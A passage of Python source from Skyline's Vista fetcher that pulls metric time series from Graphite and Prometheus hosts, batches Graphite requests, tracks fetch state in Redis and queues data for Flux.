# self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
# @added 20191111 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# Added a single functions to deal with Redis connection and the
# charset='utf-8', decode_responses=True arguments required in py3
self.redis_conn = get_redis_conn(skyline_app)
self.redis_conn_decoded = get_redis_conn_decoded(skyline_app)
def check_if_parent_is_alive(self):
"""
Check that the parent process is still alive (by sending it signal 0)
and exit if it is not.
"""
try:
kill(self.parent_pid, 0)
except:
# @added 20201203 - Bug #3856: Handle boring sparsely populated metrics in derivative_metrics
# Log warning
logger.warning('warning :: parent process is dead')
exit(0)
def fetch_process(self, i, metrics_to_fetch):
fetch_process_start = time()
logger.info('fetcher :: fetch_process started')
metrics_to_fetch_count = len(metrics_to_fetch)
logger.info('fetcher :: fetch_process to fetch %s metrics' % str(metrics_to_fetch_count))
if LOCAL_DEBUG:
logger.info('fetcher :: metrics_to_fetch - %s' % str(metrics_to_fetch))
# @added 20191127 - Feature #3338: Vista - batch Graphite requests
def param_value_from_url(url, param_name):
param_value = None
for i in url.split('?', 1)[-1].split('&'):
if i.startswith(param_name + '='):
param_value = i.split('=')[-1]
return param_value
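# Usage sketch with a hypothetical url:
# url = 'http://graphite:8888/render/?from=-10minutes&target=foo.bar&format=json'
# param_value_from_url(url, 'from') -> '-10minutes'
# param_value_from_url(url, 'target') -> 'foo.bar'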
# @added 20191127 - Feature #3338: Vista - batch Graphite requests
# Fetch metrics from the same Graphite host that have the same from
# parameter in batches
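# For example (hypothetical urls), targets that share a remote host and
# a from parameter are merged into one batch request by appending
# further &target= parameters before &format=json:
# .../render/?from=-10minutes&target=foo.bar&target=foo.baz&format=json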
try:
graphite_batch_target_count = settings.VISTA_GRAPHITE_BATCH_SIZE
except:
graphite_batch_target_count = 20
graphite_batches = [] # [batch_no, remote_host, from_timestamp, url]
in_batch_responses = []
batch_number = 0
for remote_host_type, frequency, remote_target, graphite_target, metric, url, namespace_prefix, api_key, token, user, password in metrics_to_fetch:
if remote_host_type != 'graphite':
continue
try:
url_elements = url.split('/')
remote_host = url_elements[2]
except Exception as e:
logger.error('error :: fetcher :: failed to determine the remote_host from the url - %s - %s' % (
str(url), e))
from_timestamp = None
try:
from_timestamp_str = param_value_from_url(url, 'from')
try:
from_timestamp = int(from_timestamp_str)
except:
from_timestamp = None
except Exception as e:
logger.error('error :: fetcher :: failed to determine the timestamp from the from url parameter - %s - %s' % (
str(url), e))
if not from_timestamp:
continue
target = None
try:
target = param_value_from_url(url, 'target')
except Exception as e:
logger.error('error :: fetcher :: failed to determine the metric from the target url parameter - %s - %s' % (
str(url), e))
added_to_batch = False
add_to_batch = False
for batch_number, batch_remote_host, batch_from_timestamp, batch_url in graphite_batches:
if added_to_batch:
continue
try:
if remote_host == batch_remote_host:
if str(from_timestamp) == str(batch_from_timestamp):
try:
if batch_url.count('target') < graphite_batch_target_count:
add_to_batch = int(batch_number)
except Exception as e:
logger.error('error :: fetcher :: failed to determine whether to add to batch - %s' % e)
continue
except:
logger.error('error :: fetcher :: failed to determine whether to add to batch')
if not add_to_batch:
batch_number += 1
batch_url = url
batch_data = [batch_number, remote_host, from_timestamp_str, url]
graphite_batches.append(batch_data)
added_to_batch = batch_number
if add_to_batch:
new_graphite_batches = []
for batch_number, batch_remote_host, batch_from_timestamp, batch_url in graphite_batches:
if batch_number == add_to_batch:
new_end = '&target=%s&format=json' % remote_target
new_url = batch_url.replace('&format=json', new_end)
batch_url = new_url
added_to_batch = batch_number
batch_data = [batch_number, batch_remote_host, batch_from_timestamp, batch_url]
new_graphite_batches.append(batch_data)
graphite_batches = new_graphite_batches
if added_to_batch:
in_batch_responses.append(target)
batch_responses = []
start_batch_fetches = int(time())
for batch_number, remote_host, from_timestamp_str, url in graphite_batches:
# @added 20201009 - Feature #3780: skyline_functions - sanitise_graphite_url
# Bug #3778: Handle single encoded forward slash requests to Graphite
sanitised = False
sanitised, url = sanitise_graphite_url(skyline_app, url)
try:
batch_response = requests.get(url)
batch_js = batch_response.json()
batch_responses.append(batch_js)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: failed to get valid response for batch request %s - %s' % (
str(url), e))
if batch_responses:
end_batch_fetches = int(time())
time_to_fetch_batches = end_batch_fetches - start_batch_fetches
logger.info('fetcher :: %s metric batch requests of %s metrics per batch were fetched in %s seconds' % (
str(len(batch_responses)), str(graphite_batch_target_count), str(time_to_fetch_batches)))
if in_batch_responses:
logger.info('fetcher :: %s metrics were fetched in batch requests' % str(len(in_batch_responses)))
for remote_host_type, frequency, remote_target, graphite_target, metric, url, namespace_prefix, api_key, token, user, password in metrics_to_fetch:
success = False
# @added 20191127 - Feature #3338: Vista - batch Graphite requests
# Get the metric timeseries from the batch responses and if it is
# not found no js variable will be set and the metric will be
# requested individually as per the default behaviour
js = None
batched_response = False
if remote_target in in_batch_responses:
try:
for responses in batch_responses:
for i in responses:
if str(i['target']) == remote_target:
js = i
batched_response = True
success = True
if VERBOSE_LOGGING:
logger.info('fetcher :: data for %s was fetched in a batch' % str(remote_target))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: failed to determine if %s was in batch_responses - %s' % (
str(remote_target), e))
# @added 20201009 - Feature #3780: skyline_functions - sanitise_graphite_url
# Bug #3778: Handle single encoded forward slash requests to Graphite
sanitised = False
sanitised, url = sanitise_graphite_url(skyline_app, url)
# @modified 20191127 - Feature #3338: Vista - batch Graphite requests
# Wrapped in if not success
response = None
if not success:
try:
# @modified 20191011 - Task #3258: Reduce vista logging
if LOCAL_DEBUG:
logger.info('fetcher :: getting data from %s' % str(url))
response = requests.get(url)
if response.status_code == 200:
success = True
except Exception as e:
logger.error(traceback.format_exc())
# @modified 20191115 - Branch #3262: py3
# Do not report last response data
# logger.error('error :: fetcher :: http status code - %s, reason - %s' % (
# str(response.status_code), str(response.reason)))
logger.error('error :: fetcher :: failed to get data from %s - %s' % (
str(url), e))
if not success:
continue
# @added 20191111 - Bug #3312: flux - populate_metric_worker - handle None in datapoints
# And set the flux.last key if the returned value from the remote is
# null so that time series that are mostly null do not keep on
# getting added to flux populate_metric by Vista
raw_timeseries = []
datapoints = None
try:
# @modified 20191127 - Feature #3338: Vista - batch Graphite requests
# js = response.json()
if not js:
js = response.json()
else:
if VERBOSE_LOGGING:
logger.info('fetcher :: data for %s was fetched in a batch' % str(remote_target))
if remote_host_type == 'graphite':
# @modified 20191127 - Feature #3338: Vista - batch Graphite requests
# datapoints = js[0]['datapoints']
if not batched_response:
datapoints = js[0]['datapoints']
else:
datapoints = js['datapoints']
if remote_host_type == 'prometheus':
# TODO:
# Maybe iterate through multiple metrics if response has more than one metric
# for some public lab metrics
datapoints = js['data']['result'][0]['values']
datapoints_fetched = len(datapoints)
# @modified 20191011 - Task #3258: Reduce vista logging
if LOCAL_DEBUG:
logger.info('fetcher :: retrieved %s data points from %s' % (
str(datapoints_fetched), str(url)))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: failed to get data from %s - %s' % (
str(url), e))
# Example
# datapoints[0]
# [7.3, 1556817000]
# Add each data point and timestamp to the timeseries list so
# they can be sent to Graphite
if not datapoints:
logger.info('fetcher :: failed to get any data from %s' % str(url))
continue
# @added 20191111 - Bug #3312: flux - populate_metric_worker - handle None in datapoints
valid_datapoints = []
for datapoint in datapoints:
value = None
timestamp = None
if remote_host_type == 'graphite':
try:
# @added 20191111 - Bug #3312: flux - populate_metric_worker - handle None in datapoints
raw_timeseries.append([datapoint[1], datapoint[0]])
raw_value = datapoint[0]
if raw_value is None:
continue
value = float(datapoint[0])
timestamp = int(datapoint[1])
valid_datapoints.append([value, timestamp])
except:
continue
if remote_host_type == 'prometheus':
try:
# @added 20191111 - Bug #3312: flux - populate_metric_worker - handle None in datapoints
raw_timeseries.append([datapoint[0], datapoint[1]])
raw_value = datapoint[1]
if raw_value is None:
continue
timestamp = int(datapoint[0])
value = float(datapoint[1])
except:
continue
valid_datapoints.append([timestamp, value])
datapoints = valid_datapoints
# Order the time series by timestamp as the tuple can shift
# order resulting in more recent data being added before older
# data
datapoints.sort()
# However check if the metric is known to Flux and if so do not
# use all resolutions, just fetch from the last known flux.last
# timestamp for the metric
last_flux_timestamp = None
redis_last_flux_metric_data = None
cache_key = 'flux.last.%s' % metric
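# e.g. (hypothetical) the key 'flux.last.vista.stats.web-01.cpu' holds
# the str of a [timestamp, value] list such as '[1556817000, 7.3]'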
try:
# if python_version == 3:
# redis_last_flux_metric_data = self.redis_conn.get(cache_key).decode('utf-8')
# else:
# redis_last_flux_metric_data = self.redis_conn.get(cache_key)
redis_last_flux_metric_data = self.redis_conn_decoded.get(cache_key)
if LOCAL_DEBUG:
if redis_last_flux_metric_data:
logger.info('fetcher :: Redis key %s is present' % str(cache_key))
else:
logger.info('fetcher :: Redis key %s is not present' % str(cache_key))
except AttributeError:
logger.info('fetcher :: Redis key %s is not present' % str(cache_key))
last_flux_timestamp = False
redis_last_flux_metric_data = False
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: retrieving Redis key %s data - %s' % (
str(cache_key), str(e)))
redis_last_flux_metric_data = False
if redis_last_flux_metric_data:
try:
last_flux_metric_data = literal_eval(redis_last_flux_metric_data)
last_flux_timestamp = int(last_flux_metric_data[0])
if LOCAL_DEBUG:
if last_flux_timestamp:
logger.info('fetcher :: Redis key %s last_flux_timestamp %s' % (str(cache_key), str(last_flux_timestamp)))
else:
logger.info('fetcher :: Redis key %s last_flux_timestamp unknown' % (str(cache_key)))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: fetch :: failed determining last_flux_timestamp - %s' % e)
last_flux_timestamp = False
value = None
timestamp = None
datapoints_added_to_timeseries = 0
datapoints_already_populated = 0
datapoints_with_no_value = 0
timeseries = []
for datapoint in datapoints:
try:
if remote_host_type == 'graphite':
raw_value = datapoint[0]
if raw_value is None:
continue
value = float(datapoint[0])
timestamp = int(datapoint[1])
if remote_host_type == 'prometheus':
timestamp = int(datapoint[0])
# value = float(datapoint[1])
try:
value = float(datapoint[1])
except:
continue
submit_data = True
if last_flux_timestamp:
if timestamp <= last_flux_timestamp:
submit_data = False
datapoints_already_populated += 1
if submit_data:
new_datapoint = [timestamp, value]
timeseries.append(new_datapoint)
datapoints_added_to_timeseries += 1
# nosec to exclude from bandit tests
except: # nosec
datapoints_with_no_value += 1
continue
# @added 20191111 - Bug #3312: flux - populate_metric_worker - handle None in datapoints
# And set the flux.last key if the returned value from the remote is
# null so that time series that are mostly null do not keep on
# getting added to flux populate_metric by Vista
if not timeseries:
set_flux_key = False
last_ts = None
try:
sorted_raw_timeseries = sorted(raw_timeseries, key=lambda x: x[0])
last_ts = sorted_raw_timeseries[-1][0]
if int(last_ts) > (fetch_process_start - 120):
if sorted_raw_timeseries[-1][1] is None:
set_flux_key = True
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: failed to determine if last value was null - %s' % e)
if set_flux_key:
cache_key = 'flux.last.%s' % metric
try:
# Update Redis flux key
metric_data = [int(last_ts), None]
self.redis_conn.set(cache_key, str(metric_data))
if VERBOSE_LOGGING:
logger.info('fetcher :: even though there are no data points, set the metric Redis key so as to not loop round on this metric - %s - %s' % (
cache_key, str(metric_data)))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: even though no data points, failed to set Redis key - %s - %s' % (
cache_key, e))
# Adding to the vista.fetcher.unique_metrics Redis set
redis_set = 'vista.fetcher.unique_metrics'
data = str(metric)
try:
self.redis_conn.sadd(redis_set, data)
if VERBOSE_LOGGING:
logger.info('fetcher :: even though no data points, added %s to Redis set %s' % (
remote_target, redis_set))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: even though no data points, failed to add %s to Redis set %s - %s' % (
str(data), str(redis_set), e))
continue
if not timeseries:
if VERBOSE_LOGGING:
logger.info('fetcher :: no new data points in the timeseries for %s' % metric)
continue
# Order the time series by timestamp as the tuple can shift
# order resulting in more recent data being added before older
# data
timeseries.sort()
timeseries_length = len(timeseries)
if VERBOSE_LOGGING:
logger.info('fetcher :: %s data points to add to vista.fetcher.metrics.json for %s' % (
str(timeseries_length), metric))
payload = None
timeseries_str = '"%s"' % timeseries
try:
payload = [{
'remote_host_type': remote_host_type,
'remote_target': remote_target,
'graphite_target': graphite_target,
'metric': metric,
'namespace_prefix': namespace_prefix,
'key': settings.FLUX_SELF_API_KEY,
'token': token,
'user': user,
'password': password,
'datapoints': timeseries_str
}]
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: could not build the payload json - %s' % e)
redis_set = 'vista.fetcher.metrics.json'
data = str(payload)
try:
self.redis_conn.sadd(redis_set, data)
if LOCAL_DEBUG:
logger.info('fetcher :: added data from %s to Redis set %s' % (
str(url), redis_set))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s - %s' % (
str(data), str(redis_set), e))
redis_set = 'vista.fetcher.metrics.fetched'
time_now = int(time())
data = [str(remote_target), time_now]
try:
self.redis_conn.sadd(redis_set, str(data))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s - %s' % (
str(data), str(redis_set), e))
fetch_process_end = time()
fetch_time = fetch_process_end - fetch_process_start
logger.info('fetcher :: metrics fetched in %s seconds' % str(fetch_time))
return
def run(self):
"""
- Called when the process initializes.
- Determine if Redis is up and discover the number of `unique metrics`.
- Wait for the processes to finish.
- Send skyline.vista metrics to `GRAPHITE_HOST`
"""
# Log management to prevent overwriting
# Allow the bin/<skyline_app>.d to manage the log
if os.path.isfile(skyline_app_logwait):
try:
os.remove(skyline_app_logwait)
except OSError:
logger.error('error - failed to remove %s, continuing' % skyline_app_logwait)
pass
now = time()
log_wait_for = now + 5
while now < log_wait_for:
if os.path.isfile(skyline_app_loglock):
sleep(.1)
now = time()
else:
now = log_wait_for + 1
logger.info('starting %s run' % skyline_app)
if os.path.isfile(skyline_app_loglock):
logger.error('error - bin/%s.d log management seems to have failed, continuing' % skyline_app)
try:
os.remove(skyline_app_loglock)
logger.info('log lock file removed')
except OSError:
logger.error('error - failed to remove %s, continuing' % skyline_app_loglock)
pass
else:
logger.info('bin/%s.d log management done' % skyline_app)
try:
SERVER_METRIC_PATH = '.%s' % settings.SERVER_METRICS_NAME
if SERVER_METRIC_PATH == '.':
SERVER_METRIC_PATH = ''
logger.info('SERVER_METRIC_PATH is set from settings.py to %s' % str(SERVER_METRIC_PATH))
except:
SERVER_METRIC_PATH = ''
logger.info('warning :: SERVER_METRIC_PATH is not declared in settings.py, defaults to \'\'')
logger.info('skyline_app_graphite_namespace is set to %s' % str(skyline_app_graphite_namespace))
try:
VISTA_ENABLED = settings.VISTA_ENABLED
logger.info('VISTA_ENABLED is set to %s' % str(VISTA_ENABLED))
except:
VISTA_ENABLED = True
logger.info('warning :: VISTA_ENABLED is not declared in settings.py, defaults to True')
try:
ASYNCIO_LIMIT = settings.VISTA_ASYNCIO_FETCHER_LIMIT
logger.info('fetcher :: settings.VISTA_ASYNCIO_FETCHER_LIMIT is set to %s' % str(ASYNCIO_LIMIT))
except:
ASYNCIO_LIMIT = 2
logger.info('fetcher :: warning :: VISTA_ASYNCIO_FETCHER_LIMIT is not declared in settings.py, defaults to 2')
running = True
while running:
begin_fetcher_run = int(time())
# Make sure Redis is up
redis_up = False
while not redis_up:
try:
redis_up = self.redis_conn.ping()
except:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: cannot connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
sleep(2)
try:
# @modified 20191111 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# if settings.REDIS_PASSWORD:
# self.redis_conn = StrictRedis(password=settings.REDIS_PASSWORD, unix_socket_path=settings.REDIS_SOCKET_PATH)
# else:
# self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
self.redis_conn = get_redis_conn(skyline_app)
self.redis_conn_decoded = get_redis_conn_decoded(skyline_app)
except:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: cannot connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
continue
# Report app up
try:
self.redis_conn.setex(skyline_app, 120, begin_fetcher_run)
except:
logger.error('error :: fetcher :: could not update the Redis %s key' % skyline_app)
logger.error(traceback.format_exc())
# Fetcher metrics that are known to have already been fetched;
# metrics in this set are named as namespace_prefix.metric
vista_fetcher_unique_metrics = []
redis_set = 'vista.fetcher.unique_metrics'
try:
# @modified 20191111 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# vista_fetcher_unique_metrics = list(self.redis_conn.smembers(redis_set))
vista_fetcher_unique_metrics = list(self.redis_conn_decoded.smembers(redis_set))
except:
logger.error('error :: fetcher :: could not determine vista_fetcher_unique_metrics from the Redis set %s' % redis_set)
vista_fetcher_unique_metrics = []
vista_unique_metrics = []
if vista_fetcher_unique_metrics:
for metric in vista_fetcher_unique_metrics:
# @modified 20191111 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# metric_str = metric.decode('utf-8')
metric_str = str(metric)
vista_unique_metrics.append(metric_str)
# Determine metrics to fetch
metrics_to_fetch = []
fetcher_sent_to_flux = 0
if LOCAL_DEBUG:
try:
number_of_metrics = len(settings.VISTA_FETCH_METRICS)
logger.info('fetcher :: %s metrics to retrieve' % str(number_of_metrics))
except:
pass
end_timestamp = int(time())
start_timestamp = end_timestamp - 300
# Refer to settings.VISTA_FETCH_METRICS tuple to determine the
# format of the fetch_tuple
# for target, graphite_target, fetch_tuple in metrics:
for remote_host, remote_host_type, frequency, remote_target, graphite_target, uri, namespace_prefix, api_key, token, user, password, populate_at_resolutions in settings.VISTA_FETCH_METRICS:
try:
# remote_host_type = fetch_tuple[1]
valid_remote_host_type = False
if remote_host_type == 'graphite' or remote_host_type == 'prometheus':
valid_remote_host_type = True
if not valid_remote_host_type:
logger.error('error :: invalid remote_host_type for %s in %s' % (
remote_target, str(remote_host_type)))
continue
if LOCAL_DEBUG:
logger.info('fetcher :: processing %s remote_target %s' % (
str(remote_host_type), str(remote_target)))
remote_graphite_host = None
if remote_host_type == 'graphite':
remote_graphite_host = remote_host
url = '%s%s%s' % (remote_graphite_host, uri, str(remote_target))
if LOCAL_DEBUG:
logger.info('fetcher :: with url %s' % str(url))
default_prometheus_uri = False
remote_prometheus_host = None
if remote_host_type == 'prometheus':
remote_prometheus_host = remote_host
# Hardcode the Prometheus api uri
# uri = str(fetch_tuple[3])
# uri = '/api/v1/query?query=%s[5m]' % str(remote_target)
# url encode the Prometheus metric query to handle
# labels and query chars in the URI
urlencoded_remote_target = quote(remote_target)
if uri == 'default':
default_prometheus_uri = True
uri = '/api/v1/query_range?query=%s&start=%s&end=%s&step=60s' % (
str(urlencoded_remote_target),
str(start_timestamp), str(end_timestamp))
url = '%s%s' % (remote_prometheus_host, uri)
if LOCAL_DEBUG:
logger.info('fetcher :: with url %s' % str(url))
frequency = int(frequency)
if LOCAL_DEBUG:
logger.info('fetcher :: with frequency %s' % str(frequency))
if LOCAL_DEBUG:
logger.info('fetcher :: with namespace_prefix %s' % str(namespace_prefix))
if namespace_prefix != '':
metric = '%s.%s' % (namespace_prefix, graphite_target)
metric = filesafe_metricname(metric)
else:
metric = graphite_target
metric = filesafe_metricname(metric)
if LOCAL_DEBUG:
logger.info('fetcher :: with metric %s' % str(metric))
api_key = str(api_key)
if LOCAL_DEBUG:
# @modified 20210421 - Task #4030: refactoring
# semgrep - python-logger-credential-disclosure
# logger.info('fetcher :: with api_key %s' % str(api_key))
logger.info('fetcher :: with api_key (no disclosure)')
token = str(token)
if LOCAL_DEBUG:
# @modified 20210421 - Task #4030: refactoring
# semgrep - python-logger-credential-disclosure
# logger.info('fetcher :: with token %s' % str(token))
logger.info('fetcher :: with token (no disclosure)')
user = str(user)
if LOCAL_DEBUG:
logger.info('fetcher :: with user %s' % str(user))
password = str(password)
if LOCAL_DEBUG:
# @modified 20210421 - Task #4030: refactoring
# semgrep - python-logger-credential-disclosure
# logger.info('fetcher :: with password %s' % str(password))
logger.info('fetcher :: with password (no disclosure)')
populate_at_resolutions_str = str(populate_at_resolutions)
if LOCAL_DEBUG:
logger.info('fetcher :: with populate_at_resolutions %s' % populate_at_resolutions_str)
# Handle if the user passes an empty tuple () instead of None
if populate_at_resolutions == ():
populate_at_resolutions = None
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: could not determine the required values in VISTA_FETCH_METRICS tuple for - %s - %s' % (
str(remote_target), e))
continue
# If the metric is not known to Vista and the metric
# has a populate_at_resolutions set, send to Flux to
# pre-populate Graphite
pre_populate_graphite_metric = False
if remote_target not in vista_unique_metrics:
if remote_host_type == 'graphite' and populate_at_resolutions:
pre_populate_graphite_metric = True
logger.info('fetcher :: attempting to pre-populate Graphite metric - %s' % (
metric))
if remote_host_type == 'prometheus' and populate_at_resolutions:
pre_populate_graphite_metric = True
logger.info('fetcher :: attempting to pre-populate Prometheus metric - %s' % (
metric))
else:
if LOCAL_DEBUG:
logger.info('fetcher :: remote_target %s is present in vista_unique_metrics' % str(remote_target))
# However check if the metric is known to Flux and if so do not
# use all resolutions, just fetch from the last known flux.last
# timestamp for the metric
last_flux_timestamp = None
redis_last_flux_metric_data = None
cache_key = None
try:
cache_key = 'flux.last.%s' % metric
# @modified 20191111 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# @modified 20191128 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# if python_version == 3:
# redis_last_flux_metric_data = self.redis_conn.get(cache_key).decode('utf-8')
# else:
# redis_last_flux_metric_data = self.redis_conn.get(cache_key)
redis_last_flux_metric_data = self.redis_conn_decoded.get(cache_key)
if LOCAL_DEBUG:
if redis_last_flux_metric_data:
logger.info('fetcher :: Redis key %s is present' % str(cache_key))
else:
logger.info('fetcher :: Redis key %s is not present' % str(cache_key))
except AttributeError:
logger.info('fetcher :: Redis key %s is not present' % str(cache_key))
last_flux_timestamp = False
redis_last_flux_metric_data = False
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: retrieving Redis key %s data - %s' % (
str(cache_key), str(e)))
redis_last_flux_metric_data = False
if redis_last_flux_metric_data:
try:
last_flux_metric_data = literal_eval(redis_last_flux_metric_data)
last_flux_timestamp = int(last_flux_metric_data[0])
if LOCAL_DEBUG:
if last_flux_timestamp:
logger.info('fetcher :: Redis key %s last_flux_timestamp %s' % (str(cache_key), str(last_flux_timestamp)))
else:
logger.info('fetcher :: Redis key %s last_flux_timestamp unknown' % (str(cache_key)))
except:
logger.error(traceback.format_exc())
logger.error('error :: fetch :: failed determining last_flux_timestamp')
last_flux_timestamp = False
time_now = int(time())
if last_flux_timestamp:
last_fetch = time_now - last_flux_timestamp
if last_fetch < frequency:
if LOCAL_DEBUG:
logger.info('fetcher :: last fetch was %s seconds ago, less than frequency %s seconds, not fetching' % (str(last_fetch), str(frequency)))
continue
# @added 20200107 - Task #3376: Enable vista and flux to deal with lower frequency data
# Determine the last known resolution of the metric
last_vista_metric_resolution = frequency
try:
cache_key = 'vista.last.resolution.%s' % metric
last_vista_metric_resolution_data = self.redis_conn_decoded.get(cache_key)
if last_vista_metric_resolution_data is None:
last_vista_metric_resolution_int = last_vista_metric_resolution
else:
last_vista_metric_resolution_int = int(last_vista_metric_resolution_data)
if last_vista_metric_resolution_int > 0:
last_vista_metric_resolution = last_vista_metric_resolution_int
if LOCAL_DEBUG:
if last_vista_metric_resolution:
logger.info('fetcher :: Redis key %s is present' % str(cache_key))
else:
logger.info('fetcher :: Redis key %s is not present' % str(cache_key))
except AttributeError:
logger.info('fetcher :: Redis key %s is not present' % str(cache_key))
last_vista_metric_resolution = False
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: retrieving Redis key %s data - %s' % (
str(cache_key), str(e)))
last_vista_metric_resolution = False
if remote_target in vista_unique_metrics and last_flux_timestamp:
last_expected_fetch_time = time_now - (frequency + 420)
if last_flux_timestamp < last_expected_fetch_time:
# @added 20200107 - Task #3376: Enable vista and flux to deal with lower frequency data
# Added older_than_resolution
older_than_resolution = True
if last_vista_metric_resolution:
try:
last_expected_data_time = time_now - (frequency + 420 + last_vista_metric_resolution)
if last_flux_timestamp > last_expected_data_time:
older_than_resolution = False
except:
logger.error(traceback.format_exc())
logger.error('error :: fetch :: failed determining last_expected_data_time')
# @modified 20200107 - Task #3376: Enable vista and flux to deal with lower frequency data
# Added older_than_resolution
# if populate_at_resolutions:
if populate_at_resolutions and older_than_resolution:
if remote_host_type == 'graphite' or remote_host_type == 'prometheus':
pre_populate_graphite_metric = True
behind_by_seconds = time_now - last_flux_timestamp
logger.info('fetcher :: last_flux_timestamp is behind by %s seconds, attempting to pre-populate %s' % (
str(behind_by_seconds), metric))
if remote_target in vista_unique_metrics:
if not last_flux_timestamp:
if populate_at_resolutions:
if remote_host_type == 'graphite' or remote_host_type == 'prometheus':
pre_populate_graphite_metric = True
# Problem with asyncio so using Flux directly
if remote_target in vista_unique_metrics and last_flux_timestamp and USE_FLUX:
if populate_at_resolutions:
if remote_host_type == 'graphite' or remote_host_type == 'prometheus':
pre_populate_graphite_metric = True
if pre_populate_graphite_metric:
logger.info('fetcher :: attempting to build the pre-populate Graphite metric urls - %s' % (
metric))
if LOCAL_DEBUG:
logger.info('fetcher :: pre_populate_graphite_metric - %s - %s' % (
str(pre_populate_graphite_metric), metric))
fetch_resolution_urls = []
# Build remote Graphite URLs
if remote_host_type == 'graphite' and pre_populate_graphite_metric:
logger.info('fetcher :: building the pre-populate Graphite metric urls - %s' % (
metric))
try:
# Build URLs to submit to flux/HttpPopulateMetric
resolutions = []
for resolution in populate_at_resolutions:
resolutions.append(resolution)
number_of_resolutions = len(resolutions)
current_resolution_count = 0
for resolution in resolutions:
append_url = True
if current_resolution_count < (number_of_resolutions - 1):
resolution_url = None
if current_resolution_count == 0:
next_resolution_count = 1
else:
next_resolution_count = current_resolution_count + 1
next_resolution = resolutions[next_resolution_count]
# If there is a known last_flux_timestamp only get data
# from that time period until now
if last_flux_timestamp:
if 'days' in resolution:
resolution_days = resolution.strip('days')
resolution_hours = int(resolution_days) * 24
d = datetime.today() - timedelta(hours=resolution_hours)
if 'hours' in resolution:
resolution_hours = int(resolution.strip('hours'))
d = datetime.today() - timedelta(hours=resolution_hours)
resolution_timestamp = int(d.strftime('%s'))
if resolution_timestamp < last_flux_timestamp:
append_url = False
else:
append_url = True
# If the last_flux_timestamp falls within
# the range of the resolution period, append
# otherwise the fill will leave an airgap in
# the data
if 'days' in next_resolution:
next_resolution_days = next_resolution.strip('days')
next_resolution_hours = int(next_resolution_days) * 24
d = datetime.today() - timedelta(hours=next_resolution_hours)
if 'hours' in next_resolution:
next_resolution_hours = int(next_resolution.strip('hours'))
d = datetime.today() - timedelta(hours=next_resolution_hours)
next_resolution_timestamp = int(d.strftime('%s'))
if last_flux_timestamp in range(resolution_timestamp, next_resolution_timestamp):
append_url = True
resolution_url = '%s/render/?from=-%s&until=-%s&format=json&target=%s' % (
str(remote_graphite_host), str(resolution),
str(next_resolution), str(remote_target))
if LOCAL_DEBUG:
logger.info('fetcher :: resolution_url - %s - %s' % (
str(resolution_url), metric))
else:
resolution_url = '%s/render/?from=-%s&until=-%s&format=json&target=%s' % (
str(remote_graphite_host), str(resolution),
str(next_resolution), str(remote_target))
if LOCAL_DEBUG:
logger.info('fetcher :: resolution_url - %s - %s' % (
str(resolution_url), metric))
current_resolution_count += 1
else:
if last_flux_timestamp:
if 'days' in resolution:
resolution_days = resolution.strip('days')
resolution_hours = int(resolution_days) * 24
d = datetime.today() - timedelta(hours=resolution_hours)
if 'hours' in resolution:
resolution_hours = int(resolution.strip('hours'))
d = datetime.today() - timedelta(hours=resolution_hours)
resolution_timestamp = int(d.strftime('%s'))
if last_flux_timestamp > resolution_timestamp:
append_url = True
fetch_from_timestamp = last_flux_timestamp - 600
else:
append_url = True
fetch_from_timestamp = resolution_timestamp
resolution_url = '%s/render/?from=%s&format=json&target=%s' % (
str(remote_graphite_host), str(fetch_from_timestamp),
str(remote_target))
if LOCAL_DEBUG:
logger.info('fetcher :: resolution_url - %s - %s' % (
str(resolution_url), metric))
else:
resolution_url = '%s/render/?from=-%s&format=json&target=%s' % (
str(remote_graphite_host), str(resolution),
str(remote_target))
if LOCAL_DEBUG:
logger.info('fetcher :: resolution_url - %s - %s' % (
str(resolution_url), metric))
if append_url:
fetch_resolution_urls.append(resolution_url)
if LOCAL_DEBUG:
logger.info('fetcher :: appended resolution_url - %s - %s' % (
str(resolution_url), metric))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: could not determine the required resolutions for values in VISTA_FETCH_METRICS tuple for - %s - %s' % (
str(remote_target), e))
# @added 20200108 - Task #3376: Enable vista and flux to deal with lower frequency data
# Prometheus metrics that use a custom uri cannot be pre-populated
if remote_host_type == 'prometheus' and pre_populate_graphite_metric:
if not default_prometheus_uri:
logger.info('fetcher :: cannot pre-populate Prometheus metric %s as it uses a custom uri' % (
metric))
pre_populate_graphite_metric = False
# Build remote Prometheus URLs
if remote_host_type == 'prometheus' and pre_populate_graphite_metric:
# Assuming Prometheus only has a single retention (resolution)
try:
start_seconds_ago = 1296000 # default to 15 days
for resolution in populate_at_resolutions:
# Build URL to submit to flux/HttpPopulateMetric
# url encode the Prometheus metric query to handle
# labels and query chars in the URI
if 'm' in resolution:
resolution_int = resolution.strip('m')
start_seconds_ago = int(resolution_int) * 60
if 'h' in resolution:
resolution_int = resolution.strip('h')
start_seconds_ago = (int(resolution_int) * 60) * 60
if 'd' in resolution:
resolution_int = resolution.strip('d')
